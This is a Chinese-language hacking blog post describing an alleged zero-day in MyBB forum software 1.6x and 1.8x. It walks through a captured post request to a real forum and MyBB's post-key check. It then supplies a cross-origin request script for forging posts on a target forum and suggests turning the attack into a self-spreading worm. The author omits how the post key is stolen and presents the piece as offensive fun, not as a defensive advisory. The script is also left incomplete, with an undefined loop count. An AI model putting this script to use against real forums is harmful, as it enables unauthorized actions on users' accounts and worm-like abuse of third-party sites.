知名论坛系统MyBB被爆0day漏洞

　   

　　MyBB是国际上非常优秀的免费论坛软件，最大的特色是简单但是功能却出奇的强大。支持多国语言，可以分别设置前台后台的语言，每个用户都可以设置自己使用何种语言访问论坛包括自己的时区等，自定义功能强大到没有做不到只有想不到。

　　漏洞影响多个版本

　　本次影响版本：1.6x & 1.8x

　　测试版本：1.8.3 (最新), 以及1.6.16 (1.6系列最新)

　　正是因为其强大影响力，我便开始肆意玩耍MyBB以及监控请求，在此期间我注意到一些极有可能导致漏洞出现的东西，这些都已经在多个站点上进行了测试。

　　测试过程

　　首先损坏MyBB很简单。当你去发布一个新的帖子，在提交时它会请求一些东西，以下为来自Hackforums论坛post请求的示例：

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--

　　对于MyBB这个系统我们已经了解它的一些字段了，其中第一个就是post key，如果没有这个字段，我们就不能发送任何帖子。获取这个key十分简单，稍后我们会进行详细解释。现在我们需要获取的是posthash，posthash仅仅只是一个MD5字符串，只需创建一个有效的MD5字符串就可以绕过它。我可以告诉你这是因为占位符的原因，但是深究其内在不是我们今天要讨论的问题。

　　盯着message_new和message字段，MyBB会提交这两个字段，然而它仅显示message字段中的内容，而不会显示message_new字段中的内容。所以你可以在之前的帖子message_new字段中写入cocks，当然你无法从帖子中看出与之前有什么不同。

　　如何生成post key

　　post key会依赖以下函数：

function generate_post_check()
{
    global $mybb, $session;
    if($mybb->user['uid'])
    {
        return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);
    }
    // Guests get a special string
    else
    {
        return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);
    }
}

　　接着验证post key是否调用该函数：

function verify_post_check($code, $silent=false)
{
    global $lang;
    if(generate_post_check() != $code)
    {
        if($silent == true)
        {
            return false;
        }
        else
        {
            if(defined("IN_ADMINCP"))
            {
                return false;
            }
            else
            {
                error($lang->invalid_post_code);
            }
        }
    }
    else
    {
        return true;
    }
}

　　然后我们会看到它在查找loginkey, salt, regdate信息。现在我们获取这些信息是相当的容易(我不想过多解释，这个确实太容易了)一旦获得post key，只要其是可用的并且用户还未更改密码(目前大多数论坛用户很少有经常修改密码的习惯)。

　　好了，这就开始我们的攻击。首先我们需要确定一个攻击目标(我在本机上搭建了一个站点)，接着我写了一个CORS脚本，然后用户通过浏览器点击一个用来请求帖子内容的URL，URL在另一端获取到请求后，进行处理但是不会进行消息提示。假设你构造了一个合法的请求，你将会看到网页的变化。

　　如何使用

　　基于不同的需求，可以构造不同的请求。这可用于提交帖子，获取论坛荣誉点等。如果你想把这个漏洞搞的像是蠕虫病毒一般，只需每个访问到帖子的人都在这个帖子下面继续回复(这个需要把更多的精力放在获取post key上)，说实话这种可能非常高!

　　CORS代码

　　注意：这只是来自appsec-labs的示例代码，你需要进行一些修改以适合你的攻击目标：

// I suggest adding jQuery to top of file
// You will have to modify the code to make it more useable as I won't be modifying it for you.
var url = 'http://forum.mytarget.com/';
$(document).ready(function() {
     corsMyBBPost();
});
function corsMyBBPost()
{
    for(i=0; i<times; i++)
    {
        cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);
    }
}
function cors_send(method, url, data, credentials)
{
    var cors;
    if (window.XDomainRequest)
    {
        cors = new XDomainRequest();
        if (cors)
        {
            cors.onprogress = function() { CORSstatus("Process") };
            cors.onload = function() { CORSresult(cors.responseText) };
        }
        else
            CORSstatus("Browser does not support Cross Origin Request");
    }
    else if (window.XMLHttpRequest)
    {
        cors = new XMLHttpRequest();
        cors.onreadystatechange = function() {
            if (cors.readyState == 4)
                CORSresult(cors.getAllResponseHeaders(), cors.responseText);
            else
                CORSstatus("Process");
            }
    }
    else
    {
        CORSstatus("Browser does not support AJAX");
    }
    method = method.toUpperCase();
    if (method == "POST" || method == "PUT")
        cors.open(method, url, data);
    else
        cors.open(method, url);
    if (credentials)
        cors.withCredentials = "true";
    cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    cors.send(data);
    CORSstatus("Cross Origin Resource Sharing - Start");
}
function CORSstatus(msg) {
     console.log(msg);
}
function CORSerror(msg) {
     console.log("Oh shit..." + msg);
}

　　不加任何修饰，这代码十分简洁。在此我不会描述如何盗取post key的方法，如果你自己有何领悟那是你自己的事情。

　　最后，希望大家能够从中多学多一些东西。

　　最重要的是：玩的开心便好!

原文地址:https://hack.77169.com/201508/209799.shtm